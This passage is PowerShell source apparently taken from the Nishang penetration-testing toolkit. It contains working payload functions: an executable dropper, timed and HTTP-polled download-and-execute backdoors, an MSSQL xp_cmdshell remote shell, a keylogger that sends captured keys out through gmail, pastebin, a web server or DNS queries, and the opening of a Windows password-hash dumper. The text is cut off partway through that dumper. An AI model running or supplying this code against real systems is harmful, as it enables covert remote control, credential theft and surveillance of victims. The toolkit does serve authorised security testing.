1913.PARAMETER Str
1914The string to be encoded
1915
1916.PARAMETER OutputFile
1917The path of the output file. Default is "encoded.txt" in the current working directory.
1918
1919.PARAMETER IsString
1920Use this to specify if you are passing a string ins place of a filepath.
1921
1922.EXAMPLE
1923PS > StringToBase64 "start-process calc.exe" -IsString
1924
1925.LINK
1926http://labofapenetrationtester.blogspot.com/
1927https://github.com/samratashok/nishang
1928#>
1929
1930
1931 [CmdletBinding()]
1932 Param( [Parameter(Position = 0, Mandatory = $False)]
1933 [String]
1934 $Str,
1935
1936 [Parameter(Position = 1, Mandatory = $False)]
1937 [String]
1938 $outputfile=".\base64encoded.txt",
1939
1940 [Switch]
1941 $IsString
1942 )
1943
1944 if($IsString -eq $true)
1945 {
1946
1947 $utfbytes = [System.Text.Encoding]::Unicode.GetBytes($Str)
1948
1949 }
1950 else
1951 {
1952 $utfbytes = [System.Text.Encoding]::Unicode.GetBytes((Get-Content $Str))
1953 }
1954
1955 $base64string = [System.Convert]::ToBase64String($utfbytes)
1956 Out-File -InputObject $base64string -Encoding ascii -FilePath "$outputfile"
1957 Write-Output "Encoded data written to file $outputfile"
1958}
1959
1960
1961
1962
1963####################################Convert an executable file in hex format to executable (.exe)########################################
1964
1965function TexttoEXE
1966{
1967
1968<#
1969.SYNOPSIS
1970Function to convert a PE file in hex format to executable
1971
1972.DESCRIPTION
1973This function converts a PE file in hex to executable and writes it to user temp.
1974
1975.PARAMETER Filename
1976Path of the hex text file from which executable will be created.
1977
1978.PARAMETER EXE
1979Path where the executable should be created.
1980
1981.EXAMPLE
1982PS > TexttoExe C:\evil.text C:\exe\evil.exe
1983
1984.LINK
1985http://www.exploit-monday.com/2011/09/dropping-executables-with-powershell.html
1986https://github.com/samratashok/nishang
1987#>
1988
1989
1990 [CmdletBinding()] Param (
1991 [Parameter(Position = 0, Mandatory = $True)]
1992 [String]
1993 $FileName,
1994
1995 [Parameter(Position = 1, Mandatory = $True)]
1996 [String]$EXE
1997 )
1998
1999 [String]$hexdump = get-content -path "$Filename"
2000 [Byte[]] $temp = $hexdump -split ' '
2001 [System.IO.File]::WriteAllBytes($EXE, $temp)
2002 Write-Output "Executable written to file $EXE"
2003}
2004
2005
2006
2007#############################################Waits till given time to execute a script.####################################################
2008function Execute-OnTime
2009{
2010
2011<#
2012.SYNOPSIS
2013Payload which waits till given time to execute a script.
2014
2015.DESCRIPTION
2016This payload waits till the given time (on the victim) and then downloads a PowerShell script and executes it.
2017
2018.PARAMETER PAYLOADURL
2019The URL from where the file would be downloaded.
2020
2021.PARAMETER Arguments
2022Arguments to be passed to a script. Powerpreter and other scripts in Nishang need the function name and arguments here.
2023
2024.PARAMETER time
2025The Time when the payload will be executed (in 24 hour format e.g. 23:21).
2026
2027.PARAMETER CheckURL
2028The URL which the payload would check for instructions to stop.
2029
2030.PARAMETER StopString
2031The string which if found at CheckURL will stop the payload.
2032
2033.EXAMPLE
2034PS > Execute-OnTime -PayloadURL http://pastebin.com/raw.php?i=Zhyf8rwh -Arguments Get-Information -Time hh:mm -CheckURL http://pastebin.com/raw.php?i=Zhyf8rwh -StopString stoppayload
2035
2036EXAMPLE
2037PS > Execute-OnTime -PayloadURL http://pastebin.com/raw.php?i=Zhyf8rwh -Arguments Get-Information -Time hh:mm -CheckURL http://pastebin.com/raw.php?i=Zhyf8rwh -StopString stoppayload | Do-Exfiltration -ExfilOption gmail -username <> -Password <>
2038
2039Use above command for data exfiltration to gmail
2040
2041
2042.LINK
2043http://labofapenetrationtester.com/
2044https://github.com/samratashok/nishang
2045#>
2046
2047
2048
2049 [CmdletBinding()] Param(
2050
2051 [Parameter(Position = 0, Mandatory = $True)]
2052 [String]
2053 $PayloadURL,
2054
2055 [Parameter(Position = 1, Mandatory = $True)]
2056 [String]
2057 $Arguments = "Out-Null",
2058
2059
2060 [Parameter(Position = 2, Mandatory = $True)]
2061 [String]
2062 $time,
2063
2064 [Parameter(Position = 3, Mandatory = $True)]
2065 [String]
2066 $CheckURL,
2067
2068 [Parameter(Position = 4, Mandatory = $True)]
2069 [String]
2070 $StopString
2071
2072 )
2073
2074
2075
2076 while($true)
2077 {
2078 $exec = 0
2079 start-sleep -seconds 5
2080 $webclient = New-Object System.Net.WebClient
2081 $filecontent = $webclient.DownloadString("$CheckURL")
2082 $systime = Get-Date -UFormat %R
2083 if ($systime -match $time)
2084 {
2085 $pastevalue = Invoke-Expression $webclient.DownloadString($PayloadURL)
2086 # Check for arguments to the downloaded script.
2087 if ($Arguments -ne "Out-Null")
2088 {
2089 $pastevalue = Invoke-Expression $Arguments
2090 }
2091 $pastevalue
2092 $exec++
2093 if ($exec -eq 1)
2094 {
2095 Start-Sleep -Seconds 60
2096 }
2097 }
2098 elseif ($filecontent -eq $StopString)
2099 {
2100 break
2101 }
2102 }
2103}
2104
2105
2106
2107####################################################Execute commands remotely on a MS SQL server.##############################################
2108function Execute-Command-MSSQL
2109{
2110
2111<#
2112.SYNOPSIS
2113Payload which could be used to execute commands remotely on a MS SQL server.
2114
2115.DESCRIPTION
2116This payload needs a valid administrator username and password on remote SQL server.
2117It uses the credentials to enable xp_cmdshell and provides a powershell shell, a sql shell
2118or a cmd shell on the target.
2119
2120.PARAMETER ComputerName
2121Enter CopmuterName or IP Address of the target SQL server.
2122
2123.PARAMETER UserName
2124Enter a UserName for a SQL server administrator account.
2125
2126.PARAMETER Password
2127Enter the Password for the account.
2128
2129.EXAMPLE
2130Execute-Command-MSSQL -ComputerName sqlserv01 -UserName sa -Password sa1234
2131
2132.EXAMPLE
2133Execute-Command-MSSQL -ComputerName 192.168.1.10 -UserName sa -Password sa1234
2134
2135.LINK
2136http://labofapenetrationtester.com/
2137https://github.com/samratashok/nishang
2138
2139.NOTES
2140Based mostly on the Get-TSSqlSysLogin by Niklas Goude and accompanying blog post at
2141http://blogs.technet.com/b/heyscriptingguy/archive/2012/07/03/use-powershell-to-security-test-sql-server-and-sharepoint.aspx
2142http://www.truesec.com
2143
2144#>
2145
2146 [CmdletBinding()] Param(
2147 [Parameter(Mandatory = $true, Position = 0, ValueFromPipeLine= $true)]
2148 [Alias("PSComputerName","CN","MachineName","IP","IPAddress")]
2149 [string]
2150 $ComputerName,
2151
2152 [parameter(Mandatory = $true, Position = 1)]
2153 [string]
2154 $UserName,
2155
2156 [parameter(Mandatory = $true, Position = 2)]
2157 [string]
2158 $Password
2159 )
2160Try{
2161 function Make-Connection ($query){
2162
2163 $Connection = New-Object System.Data.SQLClient.SQLConnection
2164 $Connection.ConnectionString = "Data Source=$ComputerName;Initial Catalog=Master;User Id=$userName;Password=$password;"
2165 $Connection.Open()
2166 $Command = New-Object System.Data.SQLClient.SQLCommand
2167 $Command.Connection = $Connection
2168 $Command.CommandText = $query
2169 $Reader = $Command.ExecuteReader()
2170 $Connection.Close()
2171
2172 }
2173
2174 "Connecting to $ComputerName..."
2175 start-sleep 3
2176 Make-Connection "EXEC sp_configure 'show advanced options',1; RECONFIGURE;"
2177 "`nEnabling XP_CMDSHELL...`n"
2178 start-sleep 3
2179 Make-Connection "EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE"
2180 write-host -NoNewline "Do you want a PowerShell shell (P) or a SQL Shell (S) or a cmd shell (C): "
2181 $shell = read-host
2182 while($payload -ne "exit")
2183 {
2184 $Connection = New-Object System.Data.SQLClient.SQLConnection
2185 $Connection.ConnectionString = "Data Source=$ComputerName;Initial Catalog=Master;User Id=$userName;Password=$password;"
2186 $Connection.Open()
2187 $Command = New-Object System.Data.SQLClient.SQLCommand
2188 $Command.Connection = $Connection
2189 if ($shell -eq "P")
2190 {
2191 write-host "`n`nStarting PowerShell on the target..`n"
2192 write-host -NoNewline "PS $ComputerName> "
2193 $payload = read-host
2194 $cmd = "EXEC xp_cmdshell 'powershell.exe -Command `"& {$payload}`"'"
2195 }
2196 elseif ($shell -eq "S")
2197 {
2198 write-host "`n`nStarting SQL shell on the target..`n"
2199 write-host -NoNewline "MSSQL $ComputerName> "
2200 $payload = read-host
2201 $cmd = $payload
2202 }
2203 elseif ($shell -eq "C")
2204 {
2205 write-host "`n`nStarting cmd shell on the target..`n"
2206 write-host -NoNewline "CMD $ComputerName> "
2207 $payload = read-host
2208 $cmd = "EXEC xp_cmdshell 'cmd.exe /K $payload'"
2209 }
2210
2211
2212 $Command.CommandText = "$cmd"
2213 $Reader = $Command.ExecuteReader()
2214 while ($reader.Read()) {
2215 New-Object PSObject -Property @{
2216 Name = $reader.GetValue(0)
2217 }
2218 }
2219 $Connection.Close()
2220 }
2221 }
2222 Catch {
2223 $error[0]
2224 }
2225}
2226
2227
2228function HTTP-Backdoor
2229{
2230
2231<#
2232.SYNOPSIS
2233Payload which queries a URL for instructions and then downloads and executes a powershell script.
2234
2235.DESCRIPTION
2236This payload queries the given URL and after a suitable command (given by MagicString variable) is found,
2237it downloads and executes a powershell script. The payload could be stopped remotely if the string at CheckURL matches
2238the string given in StopString variable.
2239
2240.PARAMETER CheckURL
2241The URL which the payload would query for instructions.
2242
2243.PARAMETER PayloadURL
2244The URL from where the powershell script would be downloaded.
2245
2246.PARAMETER Arguments
2247Arguments to be passed to a script. Powerpreter and other scripts in Nishang need the function name and arguments here.
2248
2249.PARAMETER MagicString
2250The string which would act as an instruction to the payload to proceed with download and execute.
2251
2252.PARAMETER StopString
2253The string which if found at CheckURL will stop the payload.
2254
2255.Example
2256
2257PS > HTTP-Backdoor
2258
2259The payload will ask for all required options.
2260
2261.EXAMPLE
2262PS > HTTP-Backdoor -CheckURL http://pastebin.com/raw.php?i=jqP2vJ3x -PayloadURL http://pastebin.com/raw.php?i=Zhyf8rwh -Arguments Get-Information -MagicString start123 -StopString stopthis
2263
2264Use above when using the payload from non-interactive shells.
2265
2266.EXAMPLE
2267PS > HTTP-Backdoor -CheckURL http://pastebin.com/raw.php?i=jqP2vJ3x -PayloadURL http://pastebin.com/raw.php?i=Zhyf8rwh -Arguments Get-Information -MagicString start123 -StopString stopthis | Do-Exfiltration -ExfilOption DNS -DomainName example.com -AuthNS 192.168.254.228
2268
2269Use above command for data exfiltration to a DNS server which logs TXT queries.
2270
2271
2272.LINK
2273http://labofapenetrationtester.com/
2274https://github.com/samratashok/nishang
2275#>
2276
2277
2278 [CmdletBinding()] Param(
2279
2280 [Parameter(Position = 0, Mandatory = $True)]
2281 [String]
2282 $CheckURL,
2283
2284 [Parameter(Position = 1, Mandatory = $True)]
2285 [String]
2286 $PayloadURL,
2287
2288 [Parameter(Position = 2, Mandatory = $False)]
2289 [String]
2290 $Arguments = "Out-Null",
2291
2292 [Parameter(Position = 3, Mandatory = $True)]
2293 [String]
2294 $MagicString,
2295
2296 [Parameter(Position = 4, Mandatory = $True)]
2297 [String]
2298 $StopString
2299 )
2300
2301 while($true)
2302 {
2303 $exec = 0
2304 start-sleep -seconds 5
2305 $webclient = New-Object System.Net.WebClient
2306 $filecontent = $webclient.DownloadString("$CheckURL")
2307 if($filecontent -eq $MagicString)
2308 {
2309 $pastevalue = Invoke-Expression $webclient.DownloadString($PayloadURL)
2310 # Check for arguments to the downloaded script.
2311 if ($Arguments -ne "Out-Null")
2312 {
2313 $pastevalue = Invoke-Expression $Arguments
2314 }
2315 $pastevalue
2316 $exec++
2317 if ($exec -eq 1)
2318 {
2319 Start-Sleep -Seconds 60
2320 }
2321 }
2322 elseif ($filecontent -eq $StopString)
2323 {
2324 break
2325 }
2326 }
2327
2328}
2329
2330#############################################Logs the keys in the context of current user.#################################################
2331function Keylogger
2332{
2333
2334<#
2335.SYNOPSIS
2336Payload which logs keys.
2337
2338.DESCRIPTION
2339This payload logs a user's keys and writes them to file key.log (I know its bad :|) in user's temp directory.
2340Saved keys could then be decoded using the Parse_Key script.
2341
2342.PARAMETER CheckURL
2343The URL which would contain the MagicString used to stop keylogging.
2344
2345.PARAMETER MagicString
2346The string which when found at CheckURL will stop the keylogger.
2347
2348.EXAMPLE
2349PS > Keylogger
2350The payload will ask for all required options.
2351
2352.EXAMPLE
2353PS > Keylogger http://example.com stopthis
2354Use above when using the payload from non-interactive shells or you don't want the payload to ask for any options.
2355
2356.EXAMPLE
2357PS > Keylogger http://example.com stopthis -exfil <dev_key> <username> <pass> 2
2358Use above when using the payload from non-interactive shells. This will exfiltrate keys to gmail.
2359
2360
2361.LINK
2362http://labofapenetrationtester.com/
2363https://github.com/samratashok/nishang
2364#>
2365
2366 [CmdletBinding(DefaultParameterSetName="noexfil")] Param(
2367 [Parameter(Parametersetname="exfil")]
2368 [Switch]
2369 $persist,
2370
2371 [Parameter(Parametersetname="exfil")]
2372 [Switch]
2373 $exfil,
2374
2375 [Parameter(Position = 0, Mandatory = $True, Parametersetname="exfil")]
2376 [Parameter(Position = 0, Mandatory = $True, Parametersetname="noexfil")]
2377 [String]
2378 $CheckURL,
2379
2380 [Parameter(Position = 1, Mandatory = $True, Parametersetname="exfil")]
2381 [Parameter(Position = 1, Mandatory = $True, Parametersetname="noexfil")]
2382 [String]
2383 $MagicString,
2384
2385 [Parameter(Position = 2, Mandatory = $False, Parametersetname="exfil")] [ValidateSet("gmail","pastebin","WebServer","DNS")]
2386 [String]
2387 $ExfilOption,
2388
2389 [Parameter(Position = 3, Mandatory = $False, Parametersetname="exfil")]
2390 [String]
2391 $dev_key = "null",
2392
2393 [Parameter(Position = 4, Mandatory = $False, Parametersetname="exfil")]
2394 [String]
2395 $username = "null",
2396
2397 [Parameter(Position = 5, Mandatory = $False, Parametersetname="exfil")]
2398 [String]
2399 $password = "null",
2400
2401 [Parameter(Position = 6, Mandatory = $False, Parametersetname="exfil")]
2402 [String]
2403 $URL = "null",
2404
2405 [Parameter(Position = 7, Mandatory = $False, Parametersetname="exfil")]
2406 [String]
2407 $DomainName = "null",
2408
2409 [Parameter(Position = 8, Mandatory = $False, Parametersetname="exfil")]
2410 [String]
2411 $AuthNS = "null"
2412
2413 )
2414
2415$functions = {
2416
2417function Keylog
2418{
2419 Param (
2420 [Parameter(Position = 0, Mandatory = $True)]
2421 [String]
2422 $MagicString,
2423
2424 [Parameter(Position = 1, Mandatory = $True)]
2425 [String]
2426 $CheckURL
2427 )
2428
2429 $signature = @"
2430 [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
2431 public static extern short GetAsyncKeyState(int virtualKeyCode);
2432"@
2433 $getKeyState = Add-Type -memberDefinition $signature -name "Newtype" -namespace newnamespace -passThru
2434 $check = 0
2435 while ($true)
2436 {
2437 Start-Sleep -Milliseconds 40
2438 $logged = ""
2439 $result=""
2440 $shift_state=""
2441 $caps_state=""
2442 for ($char=1;$char -le 254;$char++)
2443 {
2444 $vkey = $char
2445 $logged = $getKeyState::GetAsyncKeyState($vkey)
2446 if ($logged -eq -32767)
2447 {
2448 if(($vkey -ge 48) -and ($vkey -le 57))
2449 {
2450 $left_shift_state = $getKeyState::GetAsyncKeyState(160)
2451 $right_shift_state = $getKeyState::GetAsyncKeyState(161)
2452 if(($left_shift_state -eq -32768) -or ($right_shift_state -eq -32768))
2453 {
2454 $result = "S-" + $vkey
2455 }
2456 else
2457 {
2458 $result = $vkey
2459 }
2460 }
2461 elseif(($vkey -ge 64) -and ($vkey -le 90))
2462 {
2463 $left_shift_state = $getKeyState::GetAsyncKeyState(160)
2464 $right_shift_state = $getKeyState::GetAsyncKeyState(161)
2465 $caps_state = [console]::CapsLock
2466 if(!(($left_shift_state -eq -32768) -or ($right_shift_state -eq -32768)) -xor $caps_state)
2467 {
2468 $result = "S-" + $vkey
2469 }
2470 else
2471 {
2472 $result = $vkey
2473 }
2474 }
2475 elseif((($vkey -ge 186) -and ($vkey -le 192)) -or (($vkey -ge 219) -and ($vkey -le 222)))
2476 {
2477 $left_shift_state = $getKeyState::GetAsyncKeyState(160)
2478 $right_shift_state = $getKeyState::GetAsyncKeyState(161)
2479 if(($left_shift_state -eq -32768) -or ($right_shift_state -eq -32768))
2480 {
2481 $result = "S-" + $vkey
2482 }
2483 else
2484 {
2485 $result = $vkey
2486 }
2487 }
2488 else
2489 {
2490 $result = $vkey
2491 }
2492 $now = Get-Date;
2493 $logLine = "$result "
2494 $filename = "$env:temp\key.log"
2495 Out-File -FilePath $fileName -Append -InputObject "$logLine"
2496
2497 }
2498 }
2499 $check++
2500 if ($check -eq 6000)
2501 {
2502 $webclient = New-Object System.Net.WebClient
2503 $filecontent = $webclient.DownloadString("$CheckURL")
2504 if ($filecontent -eq $MagicString)
2505 {
2506 break
2507 }
2508 $check = 0
2509 }
2510 }
2511}
2512
2513
2514 function Keypaste
2515 {
2516 Param (
2517 [Parameter(Position = 0, Mandatory = $True)]
2518 [String]
2519 $ExfilOption,
2520
2521 [Parameter(Position = 1, Mandatory = $True)]
2522 [String]
2523 $dev_key,
2524
2525 [Parameter(Position = 2, Mandatory = $True)]
2526 [String]
2527 $username,
2528
2529 [Parameter(Position = 3, Mandatory = $True)]
2530 [String]
2531 $password,
2532
2533 [Parameter(Position = 4, Mandatory = $True)]
2534 [String]
2535 $URL,
2536
2537 [Parameter(Position = 5, Mandatory = $True)]
2538 [String]
2539 $AuthNS,
2540
2541 [Parameter(Position = 6, Mandatory = $True)]
2542 [String]
2543 $MagicString,
2544
2545 [Parameter(Position = 7, Mandatory = $True)]
2546 [String]
2547 $CheckURL
2548 )
2549
2550 $check = 0
2551 while($true)
2552 {
2553 $read = 0
2554 Start-Sleep -Seconds 5
2555 $pastevalue=Get-Content $env:temp\key.log
2556 $read++
2557 if ($read -eq 30)
2558 {
2559 Out-File -FilePath $env:temp\key.log -Force -InputObject " "
2560 $read = 0
2561 }
2562 $now = Get-Date;
2563 $name = $env:COMPUTERNAME
2564 $paste_name = $name + " : " + $now.ToUniversalTime().ToString("dd/MM/yyyy HH:mm:ss:fff")
2565 function post_http($url,$parameters)
2566 {
2567 $http_request = New-Object -ComObject Msxml2.XMLHTTP
2568 $http_request.open("POST", $url, $false)
2569 $http_request.setRequestHeader("Content-type","application/x-www-form-urlencoded")
2570 $http_request.setRequestHeader("Content-length", $parameters.length);
2571 $http_request.setRequestHeader("Connection", "close")
2572 $http_request.send($parameters)
2573 $script:session_key=$http_request.responseText
2574 }
2575
2576 function Compress-Encode
2577 {
2578 #Compression logic from http://blog.karstein-consulting.com/2010/10/19/how-to-embedd-compressed-scripts-in-other-powershell-scripts/
2579 $encdata = [string]::Join("`n", $pastevalue)
2580 $ms = New-Object System.IO.MemoryStream
2581 $cs = New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Compress)
2582 $sw = New-Object System.IO.StreamWriter($cs)
2583 $sw.Write($encdata)
2584 $sw.Close();
2585 $Compressed = [Convert]::ToBase64String($ms.ToArray())
2586 $Compressed
2587 }
2588
2589 if ($exfiloption -eq "pastebin")
2590 {
2591 $utfbytes = [System.Text.Encoding]::UTF8.GetBytes($Data)
2592 $pastevalue = [System.Convert]::ToBase64String($utfbytes)
2593 post_http "https://pastebin.com/api/api_login.php" "api_dev_key=$dev_key&api_user_name=$username&api_user_password=$password"
2594 post_http "https://pastebin.com/api/api_post.php" "api_user_key=$session_key&api_option=paste&api_dev_key=$dev_key&api_paste_name=$pastename&api_paste_code=$pastevalue&api_paste_private=2"
2595 }
2596
2597 elseif ($exfiloption -eq "gmail")
2598 {
2599 #http://stackoverflow.com/questions/1252335/send-mail-via-gmail-with-powershell-v2s-send-mailmessage
2600 $smtpserver = "smtp.gmail.com"
2601 $msg = new-object Net.Mail.MailMessage
2602 $smtp = new-object Net.Mail.SmtpClient($smtpServer )
2603 $smtp.EnableSsl = $True
2604 $smtp.Credentials = New-Object System.Net.NetworkCredential("$username", "$password");
2605 $msg.From = "$username@gmail.com"
2606 $msg.To.Add("$username@gmail.com")
2607 $msg.Subject = $pastename
2608 $msg.Body = $pastevalue
2609 if ($filename)
2610 {
2611 $att = new-object Net.Mail.Attachment($filename)
2612 $msg.Attachments.Add($att)
2613 }
2614 $smtp.Send($msg)
2615 }
2616
2617 elseif ($exfiloption -eq "webserver")
2618 {
2619 $Data = Compress-Encode
2620 post_http $URL $Data
2621 }
2622 elseif ($ExfilOption -eq "DNS")
2623 {
2624 $code = Compress-Encode
2625 $lengthofsubstr = 0
2626 $queries = [int]($code.Length/63)
2627 while ($queries -ne 0)
2628 {
2629 $querystring = $code.Substring($lengthofsubstr,63)
2630 Invoke-Expression "nslookup -querytype=txt $querystring.$DomaName $AuthNS"
2631 $lengthofsubstr += 63
2632 $queries -= 1
2633 }
2634 $mod = $code.Length%63
2635 $query = $code.Substring($code.Length - $mod, $mod)
2636 Invoke-Expression "nslookup -querytype=txt $query.$DomainName $AuthNS"
2637
2638 }
2639
2640 $check++
2641 if ($check -eq 6000)
2642 {
2643 $check = 0
2644 $webclient = New-Object System.Net.WebClient
2645 $filecontent = $webclient.DownloadString("$CheckURL")
2646 if ($filecontent -eq $MagicString)
2647 {
2648 break
2649 }
2650 }
2651 }
2652 }
2653}
2654
2655 if ($exfil -eq $True)
2656 {
2657 start-job -InitializationScript $functions -scriptblock {Keypaste $args[0] $args[1] $args[2] $args[3] $args[4] $args[5] $args[6] $args[7]} -ArgumentList @($ExfilOption,$dev_key,$username,$password,$URL,$AuthNS,$MagicString,$CheckURL)
2658 start-job -InitializationScript $functions -scriptblock {Keylog $args[0] $args[1]} -ArgumentList @($MagicString,$CheckURL)
2659 }
2660 else
2661 {
2662 start-job -InitializationScript $functions -scriptblock {Keylog $args[0] $args[1]} -ArgumentList @($MagicString,$CheckURL)
2663 }
2664}
2665
2666
2667##########################################################Dump windows password hashes######################################
2668###Thanks David Kennedy###
2669###powerdump.rb from msf
2670function Get-PassHashes {
2671<#
2672.SYNOPSIS
2673Nishang payload which dumps password hashes.
2674
2675.DESCRIPTION
2676The payload dumps password hashes using the modified powerdump script from MSF. Administrator privileges are required for this script
2677(but not SYSTEM privs as for the original powerdump)
2678
2679.EXAMPLE
2680PS > Get-PassHashes
2681
2682.LINK
2683http://www.labofapenetrationtester.com/2013/05/poshing-hashes-part-2.html?showComment=1386725874167#c8513980725823764060
2684https://github.com/samratashok/nishang
2685
2686#>
2687[CmdletBinding()]
2688Param ()
2689
2690
2691#######################################powerdump written by David Kennedy#########################################
2692function LoadApi
2693{
2694 $oldErrorAction = $global:ErrorActionPreference;
2695 $global:ErrorActionPreference = "SilentlyContinue";
2696 $test = [PowerDump.Native];
2697 $global:ErrorActionPreference = $oldErrorAction;
2698 if ($test)
2699 {
2700 # already loaded
2701 return;
2702 }
2703
2704$code = @'
2705using System;
2706using System.Security.Cryptography;
2707using System.Runtime.InteropServices;
2708using System.Text;
2709
2710namespace PowerDump
2711{
2712 public class Native
2713 {
2714 [DllImport("advapi32.dll", CharSet = CharSet.Auto)]
2715 public static extern int RegOpenKeyEx(
2716 int hKey,
2717 string subKey,
2718 int ulOptions,
2719 int samDesired,
2720 out int hkResult);
2721
2722 [DllImport("advapi32.dll", EntryPoint = "RegEnumKeyEx")]
2723 extern public static int RegEnumKeyEx(
2724 int hkey,
2725 int index,
2726 StringBuilder lpName,
2727 ref int lpcbName,
2728 int reserved,
2729 StringBuilder lpClass,
2730 ref int lpcbClass,
2731 out long lpftLastWriteTime);
2732
2733 [DllImport("advapi32.dll", EntryPoint="RegQueryInfoKey", CallingConvention=CallingConvention.Winapi, SetLastError=true)]
2734 extern public static int RegQueryInfoKey(
2735 int hkey,
2736 StringBuilder lpClass,
2737 ref int lpcbClass,
2738 int lpReserved,
2739 out int lpcSubKeys,
2740 out int lpcbMaxSubKeyLen,
2741 out int lpcbMaxClassLen,
2742 out int lpcValues,
2743 out int lpcbMaxValueNameLen,
2744 out int lpcbMaxValueLen,
2745 out int lpcbSecurityDescriptor,
2746 IntPtr lpftLastWriteTime);
2747
2748 [DllImport("advapi32.dll", SetLastError=true)]
2749 public static extern int RegCloseKey(
2750 int hKey);
2751
2752 }
2753 } // end namespace PowerDump
2754
2755 public class Shift {
2756 public static int Right(int x, int count) { return x >> count; }
2757 public static uint Right(uint x, int count) { return x >> count; }
2758 public static long Right(long x, int count) { return x >> count; }
2759 public static ulong Right(ulong x, int count) { return x >> count; }
2760 public static int Left(int x, int count) { return x << count; }
2761 public static uint Left(uint x, int count) { return x << count; }
2762 public static long Left(long x, int count) { return x << count; }
2763 public static ulong Left(ulong x, int count) { return x << count; }
2764 }
2765'@
2766
2767 $provider = New-Object Microsoft.CSharp.CSharpCodeProvider
2768 $dllName = [PsObject].Assembly.Location
2769 $compilerParameters = New-Object System.CodeDom.Compiler.CompilerParameters
2770 $assemblies = @("System.dll", $dllName)
2771 $compilerParameters.ReferencedAssemblies.AddRange($assemblies)
2772 $compilerParameters.GenerateInMemory = $true
2773 $compilerResults = $provider.CompileAssemblyFromSource($compilerParameters, $code)
2774 if($compilerResults.Errors.Count -gt 0) {
2775 $compilerResults.Errors | % { Write-Error ("{0}:`t{1}" -f $_.Line,$_.ErrorText) }
2776 }
2777
2778}
2779
2780$antpassword = [Text.Encoding]::ASCII.GetBytes("NTPASSWORD`0");
2781$almpassword = [Text.Encoding]::ASCII.GetBytes("LMPASSWORD`0");
2782$empty_lm = [byte[]]@(0xaa,0xd3,0xb4,0x35,0xb5,0x14,0x04,0xee,0xaa,0xd3,0xb4,0x35,0xb5,0x14,0x04,0xee);
2783$empty_nt = [byte[]]@(0x31,0xd6,0xcf,0xe0,0xd1,0x6a,0xe9,0x31,0xb7,0x3c,0x59,0xd7,0xe0,0xc0,0x89,0xc0);
2784$odd_parity = @(
2785 1, 1, 2, 2, 4, 4, 7, 7, 8, 8, 11, 11, 13, 13, 14, 14,
2786 16, 16, 19, 19, 21, 21, 22, 22, 25, 25, 26, 26, 28, 28, 31, 31,
2787 32, 32, 35, 35, 37, 37, 38, 38, 41, 41, 42, 42, 44, 44, 47, 47,
2788 49, 49, 50, 50, 52, 52, 55, 55, 56, 56, 59, 59, 61, 61, 62, 62,
2789 64, 64, 67, 67, 69, 69, 70, 70, 73, 73, 74, 74, 76, 76, 79, 79,
2790 81, 81, 82, 82, 84, 84, 87, 87, 88, 88, 91, 91, 93, 93, 94, 94,
2791 97, 97, 98, 98,100,100,103,103,104,104,107,107,109,109,110,110,
2792 112,112,115,115,117,117,118,118,121,121,122,122,124,124,127,127,
2793 128,128,131,131,133,133,134,134,137,137,138,138,140,140,143,143,
2794 145,145,146,146,148,148,151,151,152,152,155,155,157,157,158,158,
2795 161,161,162,162,164,164,167,167,168,168,171,171,173,173,174,174,
2796 176,176,179,179,181,181,182,182,185,185,186,186,188,188,191,191,
2797 193,193,194,194,196,196,199,199,200,200,203,203,205,205,206,206,
2798 208,208,211,211,213,213,214,214,217,217,218,218,220,220,223,223,
2799 224,224,227,227,229,229,230,230,233,233,234,234,236,236,239,239,
2800 241,241,242,242,244,244,247,247,248,248,251,251,253,253,254,254
2801);
2802
2803function sid_to_key($sid)
2804{
2805 $s1 = @();
2806 $s1 += [char]($sid -band 0xFF);
2807 $s1 += [char]([Shift]::Right($sid,8) -band 0xFF);
2808 $s1 += [char]([Shift]::Right($sid,16) -band 0xFF);
2809 $s1 += [char]([Shift]::Right($sid,24) -band 0xFF);
2810 $s1 += $s1[0];
2811 $s1 += $s1[1];
2812 $s1 += $s1[2];
2813 $s2 = @();
2814 $s2 += $s1[3]; $s2 += $s1[0]; $s2 += $s1[1]; $s2 += $s1[2];
2815 $s2 += $s2[0]; $s2 += $s2[1]; $s2 += $s2[2];
2816 return ,((str_to_key $s1),(str_to_key $s2));
2817}
2818
2819function str_to_key($s)
2820{
2821 $key = @();
2822 $key += [Shift]::Right([int]($s[0]), 1 );
2823 $key += [Shift]::Left( $([int]($s[0]) -band 0x01), 6) -bor [Shift]::Right([int]($s[1]),2);
2824 $key += [Shift]::Left( $([int]($s[1]) -band 0x03), 5) -bor [Shift]::Right([int]($s[2]),3);
2825 $key += [Shift]::Left( $([int]($s[2]) -band 0x07), 4) -bor [Shift]::Right([int]($s[3]),4);
2826 $key += [Shift]::Left( $([int]($s[3]) -band 0x0F), 3) -bor [Shift]::Right([int]($s[4]),5);
2827 $key += [Shift]::Left( $([int]($s[4]) -band 0x1F), 2) -bor [Shift]::Right([int]($s[5]),6);
2828 $key += [Shift]::Left( $([int]($s[5]) -band 0x3F), 1) -bor [Shift]::Right([int]($s[6]),7);
2829 $key += $([int]($s[6]) -band 0x7F);
2830 0..7 | %{
2831 $key[$_] = [Shift]::Left($key[$_], 1);
2832 $key[$_] = $odd_parity[$key[$_]];
2833 }
2834 return ,$key;
2835}
2836
2837function NewRC4([byte[]]$key)
2838{
2839 return new-object Object |
2840 Add-Member NoteProperty key $key -PassThru |
2841 Add-Member NoteProperty S $null -PassThru |
2842 Add-Member ScriptMethod init {
2843 if (-not $this.S)
2844 {
2845 [byte[]]$this.S = 0..255;
2846 0..255 | % -begin{[long]$j=0;}{
2847 $j = ($j + $this.key[$($_ % $this.key.Length)] + $this.S[$_]) % $this.S.Length;
2848 $temp = $this.S[$_]; $this.S[$_] = $this.S[$j]; $this.S[$j] = $temp;
2849 }
2850 }
2851 } -PassThru |
2852 Add-Member ScriptMethod "encrypt" {
2853 $data = $args[0];
2854 $this.init();
2855 $outbuf = new-object byte[] $($data.Length);
2856 $S2 = $this.S[0..$this.S.Length];
2857 0..$($data.Length-1) | % -begin{$i=0;$j=0;} {
2858 $i = ($i+1) % $S2.Length;
2859 $j = ($j + $S2[$i]) % $S2.Length;
2860 $temp = $S2[$i];$S2[$i] = $S2[$j];$S2[$j] = $temp;
2861 $a = $data[$_];
2862 $b = $S2[ $($S2[$i]+$S2[$j]) % $S2.Length ];
2863 $outbuf[$_] = ($a -bxor $b);
2864 }
2865 return ,$outbuf;
2866 } -PassThru
2867}
2868
2869function des_encrypt([byte[]]$data, [byte[]]$key)
2870{
